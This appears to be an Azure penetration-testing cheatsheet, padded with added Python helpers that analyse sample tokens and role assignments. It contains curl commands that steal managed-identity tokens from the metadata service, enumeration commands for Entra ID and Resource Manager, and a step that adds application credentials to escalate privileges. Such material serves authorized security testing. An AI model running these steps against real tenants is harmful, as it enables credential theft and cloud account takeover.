
Cloud Pentest Cheatsheet - Azure

Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are:
  • Azure Active Directory (AAD)
  • Azure Resource Manager (ARM)
  • Office 365 (O365)

Initial Access

Try to get a user credential via OSINT or social engineering, or try to compromise a web application hosted on an Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.

Entra ID Directory Role

Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID.

Types of Roles:

  1. Built-in Directory Roles
    • Global Administrator
    • Application Administrator
    • User Administrator
  2. Custom Directory Roles

Accessing APIs in Azure

Entra ID - Access via Microsoft Graph API Endpoint

{HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters}

Azure Resource Manager API Endpoint (ARM-specific)

{HTTP method} https://management.azure.com/{version}/{resource}?{query-parameters}

O365 API (Management, Outlook, and Other Applications)

{HTTP method} https://*.office.com/{version}/{resource}?{query-parameters}

Fetching OAuth Tokens from Azure

Resource for ARM is https://management.azure.com/
Resource for Microsoft Graph API is https://graph.microsoft.com/

Get OAuth Token for Azure (ARM):

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Get OAuth Token for Microsoft Graph API:

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
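A token fetched from IMDS this way tells you nothing about which identity it represents until you decode its claims; the `oid` claim is what you later pass to `Get-AzRoleAssignment -ObjectId`. The Python below is an added example, not from the original cheatsheet: it decodes the claims segment of the JWT offline (no signature check), using a constructed sample token and IMDS response. The `xms_mirid` claim named here is the one managed-identity tokens use to identify the identity's resource.

```python
import base64
import json

def _b64url(obj: dict) -> str:
    """Base64url-encode a JSON object without padding, as JWT segments are."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

# Constructed sample: a fake, unsigned JWT in the shape of a managed-identity
# token, wrapped in the JSON that IMDS returns. Not a real Azure token.
SAMPLE_JWT = ".".join([
    _b64url({"typ": "JWT", "alg": "RS256", "kid": "constructed-kid"}),
    _b64url({
        "aud": "https://management.azure.com/",
        "iss": "https://sts.windows.net/00000000-0000-0000-0000-000000000000/",
        "exp": 1700003600,
        "tid": "00000000-0000-0000-0000-000000000000",
        "appid": "11111111-1111-1111-1111-111111111111",
        "oid": "22222222-2222-2222-2222-222222222222",
        "xms_mirid": "/subscriptions/SUB-ID/resourcegroups/PROD-RG/providers/"
                     "Microsoft.Compute/virtualMachines/prod-vm",
    }),
    "c2lnbmF0dXJl",  # placeholder signature segment; nothing here verifies it
])
SAMPLE_IMDS_RESPONSE = json.dumps({
    "access_token": SAMPLE_JWT, "expires_in": "3599", "token_type": "Bearer",
    "resource": "https://management.azure.com/",
})

def decode_jwt_payload(token: str) -> dict:
    """Return the claims segment of a JWT, re-adding the padding base64url strips."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))

def summarize_imds_token(imds_json: str) -> dict:
    """Pull out the claims that say which identity the token belongs to."""
    body = json.loads(imds_json)
    claims = decode_jwt_payload(body["access_token"])
    return {
        "resource": body["resource"],
        "audience": claims.get("aud"),
        "tenant_id": claims.get("tid"),
        "principal_oid": claims.get("oid"),  # the ObjectId for Get-AzRoleAssignment
        "client_app_id": claims.get("appid"),
        "managed_identity": claims.get("xms_mirid"),  # resource id of the identity
        "expires_at": claims.get("exp"),
    }
```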

Enterprise Applications Included in Office 365

Office 365 encompasses a variety of enterprise applications, including:

Office 365 Management Access

Web Portals:

Simple Enumeration Steps 

#login using compromised account
az login
az account list

#Get the user ID of a given user
Get-MgUser -Filter "startswith(displayName,'UserNameHere')"

#Get the list of groups the user is a member of
Get-MgUserMemberOf -UserId [UserID]

#List all objects owned by the user
Get-MgUserOwnedObject -UserId [UserID] | ConvertTo-Json

#Get an application object id & app id :
Get-MgApplication -Filter "startswith(displayName,'prod-app')"

#Get the owner(s) of an application in the Entra ID tenant :
Get-MgApplicationOwner -ApplicationId "AppObjectID" | ConvertTo-Json

#As an app owner, create an application credential.
Add-MgApplicationPassword -ApplicationId "AppObjectID" | ConvertTo-Json

#Check the directory role assigned to the prod application (service principal members of the role).
Get-MgDirectoryRoleMemberAsServicePrincipal -DirectoryRoleId 664f8b57-19df-4893-91f2-6657c3d27b5c | ConvertTo-Json

#Get all the role assignments the "dev1" user has on the Azure subscription
az role assignment list --assignee 'dev1@domain.com' --all

#Enumerate VM instances and their public IP addresses:
az vm list
az vm list-ip-addresses --name prod-vm --resource-group PROD-RG

#Exploit the public facing application and retrieve the access token of the VM's managed identity from IMDS
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

#Configure the access token in the Az PowerShell module :
$token = "AccessToken"
Connect-AzAccount -AccessToken $token -AccountId [Subscription ID]

#Now Check Again, role assignment of managed identity attached to vm :
Get-AzRoleAssignment -ObjectId [PrincipalID-ManagedIdentity]


#Enumerate the MS Graph API permissions of a given application (object ID) and resolve one role ID to its name
$app = Get-MgApplication -ApplicationId [APP_OBJECT_ID_Here]
$app.RequiredResourceAccess | ConvertTo-Json
$res = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$res.AppRoles | Where-Object {$_.Id -eq '[RoleID]'} | ConvertTo-Json

Using AZ Powershell Module

powershell.exe -executionpolicy unrestricted
Install-Module -Name Az -Repository PSGallery -Force
Import-Module Az.Accounts
$token = 'JWT Token'
Connect-AzAccount -AccessToken $token -AccountId [Subscription/Tenant ID]

Microsoft Graph CLI - Powershell

#Installation
Install-Module Microsoft.Graph -Scope CurrentUser -Repository PSGallery -Force

#Validate the Installation
Get-InstalledModule Microsoft.Graph

# Auth via browser
Connect-MgGraph -Scopes "Directory.Read.All"

# Import Module
powershell.exe -executionpolicy unrestricted
Import-Module Microsoft.Graph.Authentication

# Get OAuth token for Graph API
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

#Logging in with a token (Connect-MgGraph expects the token as a SecureString)
$token = 'eyJ0'
$secureToken = ConvertTo-SecureString $token -AsPlainText -Force
Connect-MgGraph -AccessToken $secureToken

# Get currently logged-in session information or login via Browser
Get-MgContext

#Generate an AccessToken with creds
az account get-access-token --resource https://graph.microsoft.com
Connect-MgGraph -AccessToken (ConvertTo-SecureString '[TOKEN]' -AsPlainText -Force)

#Get a list of all directory roles
Get-MgDirectoryRole | ConvertTo-Json

#Get a list of members of a directory role
Get-MgDirectoryRoleMember -DirectoryRoleId [Directory RoleID] -All | ConvertTo-Json

#Get a list of users in Entra ID
Get-MgUser

#Get the list of groups the user is a member of
Get-MgUserMemberOf -UserId [UserID]

#Get the user ID of a given user
Get-MgUser -Filter "startswith(displayName,'UserNameHere')"

#List all objects owned by the user
Get-MgUserOwnedObject -UserId [UserID] | ConvertTo-Json

#Get a list of all groups in Entra ID
Get-MgGroup

#Get a list of members of a group
Get-MgGroupMember -GroupId [GroupID] | ConvertTo-Json

Entra ID Application / Service Principal

#Get the list of all applications.
Get-MgApplication

#Get the details about a specific application.
Get-MgApplication -ApplicationId [ApplicationObjectID] | ConvertTo-Json

#Get the details about the owner of the specified application.
Get-MgApplicationOwner -ApplicationId [ApplicationObjectID] | ConvertTo-Json

#Get the permissions an application requires (application permissions have Type 'Role', delegated ones Type 'Scope').
$app = Get-MgApplication -ApplicationId [ApplicationObjectID]
$app.RequiredResourceAccess

#Get the details of an App Role for the Microsoft Graph API.
$res = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$res.AppRoles | Where-Object {$_.Id -eq 'AppRoleID'} | ConvertTo-Json

#Get only the delegated permissions (Type 'Scope') an application requires.
$app = Get-MgApplication -ApplicationId [ApplicationObjectID]
$app.RequiredResourceAccess.ResourceAccess | Where-Object {$_.Type -eq 'Scope'} | ConvertTo-Json
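Resolving the permission GUIDs in $app.RequiredResourceAccess against the Graph service principal's AppRoles one ID at a time (as in the steps above and in the earlier "Simple Enumeration Steps") gets tedious for an app with many permissions. The Python below is an added example, not part of the original cheatsheet: it does that join over the whole list and flags tenant-wide application permissions. The role IDs and names are constructed samples; the Graph appId is the real well-known value, and the field names follow the Microsoft.Graph PowerShell objects.

```python
# Microsoft Graph's well-known resource appId (the same in every tenant).
GRAPH_APP_ID = "00000003-0000-0000-c000-000000000000"

# Name fragments of permissions that let an app read or change the whole
# directory or its role model, acting as itself rather than as a user.
HIGH_IMPACT_MARKERS = ("ReadWrite.All", "RoleManagement.", "AppRoleAssignment.")

# Constructed sample in the shape of $app.RequiredResourceAccess; the role ids
# are made up (real ones come from $res.AppRoles in the tenant).
SAMPLE_REQUIRED_RESOURCE_ACCESS = [{
    "ResourceAppId": GRAPH_APP_ID,
    "ResourceAccess": [
        {"Id": "aaaa0001-0000-0000-0000-000000000001", "Type": "Role"},
        {"Id": "aaaa0002-0000-0000-0000-000000000002", "Type": "Role"},
        {"Id": "aaaa0003-0000-0000-0000-000000000003", "Type": "Scope"},
        {"Id": "aaaa0009-0000-0000-0000-000000000009", "Type": "Role"},
    ],
}]
# Constructed sample in the shape of the Graph service principal's AppRoles.
SAMPLE_GRAPH_APP_ROLES = [
    {"Id": "aaaa0001-0000-0000-0000-000000000001", "Value": "Directory.Read.All"},
    {"Id": "aaaa0002-0000-0000-0000-000000000002", "Value": "RoleManagement.ReadWrite.Directory"},
    {"Id": "aaaa0003-0000-0000-0000-000000000003", "Value": "User.Read"},
]

def resolve_graph_app_roles(required_resource_access, graph_app_roles) -> list:
    """Map an app's Graph application permissions (Type 'Role') to their names.

    'Scope' entries are delegated permissions and are skipped: they act on
    behalf of a signed-in user, not as the application itself.
    """
    names_by_id = {r["Id"].lower(): r["Value"] for r in graph_app_roles}
    resolved = []
    for rra in required_resource_access:
        if rra["ResourceAppId"].lower() != GRAPH_APP_ID:
            continue  # permissions on other resource apps are out of scope here
        for access in rra["ResourceAccess"]:
            if access["Type"] != "Role":
                continue
            name = names_by_id.get(access["Id"].lower(), "<unknown role id>")
            resolved.append({
                "id": access["Id"],
                "value": name,
                "high_impact": any(m in name for m in HIGH_IMPACT_MARKERS),
            })
    return resolved

def high_impact_permissions(required_resource_access, graph_app_roles) -> list:
    """Just the names of the flagged application permissions."""
    roles = resolve_graph_app_roles(required_resource_access, graph_app_roles)
    return [r["value"] for r in roles if r["high_impact"]]
```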

Enumeration : Azure Resource Manager - AZ CLI

# Auth via Browser
az login

# Auth via Service Principal (App ID + Password)
az login --service-principal -u ApplicationID_Here -p PasswordHere --tenant TenantID_Here

#Get details about the currently logged in session
az account show

#Get the list of all available subscriptions
az account list --all

#Get the details of a subscription
az account show -s Subscription-ID/Name

Resource Group :

#Get the list of available resource groups in the current subscription
az group list

#Get the list of available resource groups in a specified subscription
az group list -s Subscription-ID/Name

Azure Resources :

#Get the list of available resources in the current subscription
az resource list

#Get the list of available resources in a specified resource group
az resource list --resource-group ResourceGroupName

Role Assignment :

#List roles assigned in a specified subscription.
az role assignment list --subscription Subscription-ID/Name

#List roles assigned in the current subscription, including inherited ones
az role assignment list --all

#List all roles assigned to an identity [user, service principal, managed identity]
az role assignment list --assignee ObjectID/Sign-InEmail/ServicePrincipal --all

Role Definition :

#List roles with their assigned permissions [Role Definition - for built-in and custom roles]
az role definition list

#Get the full information about a specified role
az role definition list -n RoleName

#List custom roles with their assigned permissions
az role definition list --custom-role-only
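The role assignment listing above is long in any real subscription, and the entries that matter most are the privileged built-in roles (Owner, Contributor, User Access Administrator) granted at wide scope. The Python below is an added example, not from the original cheatsheet: it reads the JSON that `az role assignment list --all -o json` produces, keeps only those roles and orders them widest scope first. The input is a constructed sample; the field names follow the az CLI output.

```python
import json

# Built-in roles that allow changing resources or granting access to others.
PRIVILEGED_ROLES = {"Owner", "Contributor", "User Access Administrator"}

# Constructed sample in the shape of `az role assignment list --all -o json`,
# trimmed to the fields used below. Not output from a real tenant.
SAMPLE_ASSIGNMENTS = json.dumps([
    {"principalName": "dev1@domain.com", "principalType": "User",
     "roleDefinitionName": "Reader",
     "scope": "/subscriptions/SUB-ID/resourceGroups/PROD-RG"},
    {"principalName": "dev1@domain.com", "principalType": "User",
     "roleDefinitionName": "Contributor", "scope": "/subscriptions/SUB-ID"},
    {"principalName": "prod-vm", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Owner", "scope": "/subscriptions/SUB-ID"},
    {"principalName": "backup-sp", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Storage Blob Data Reader",
     "scope": "/subscriptions/SUB-ID/resourceGroups/PROD-RG/providers/"
              "Microsoft.Storage/storageAccounts/prodstore"},
])

def scope_level(scope: str) -> str:
    """Classify an ARM scope string by how much it covers."""
    parts = scope.strip("/").split("/")
    if parts[0].lower() == "providers" and parts[1].lower() == "microsoft.management":
        return "managementGroup"
    if len(parts) == 2:
        return "subscription"
    if len(parts) == 4 and parts[2].lower() == "resourcegroups":
        return "resourceGroup"
    return "resource"

def find_privileged_assignments(assignments_json: str) -> list:
    """Return privileged assignments for review, widest scope first."""
    order = {"managementGroup": 0, "subscription": 1, "resourceGroup": 2, "resource": 3}
    findings = []
    for a in json.loads(assignments_json):
        if a["roleDefinitionName"] not in PRIVILEGED_ROLES:
            continue
        findings.append({
            "principal": a["principalName"],
            "type": a["principalType"],
            "role": a["roleDefinitionName"],
            "scope": a["scope"],
            "level": scope_level(a["scope"]),
        })
    return sorted(findings, key=lambda f: (order[f["level"]], f["principal"]))
```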


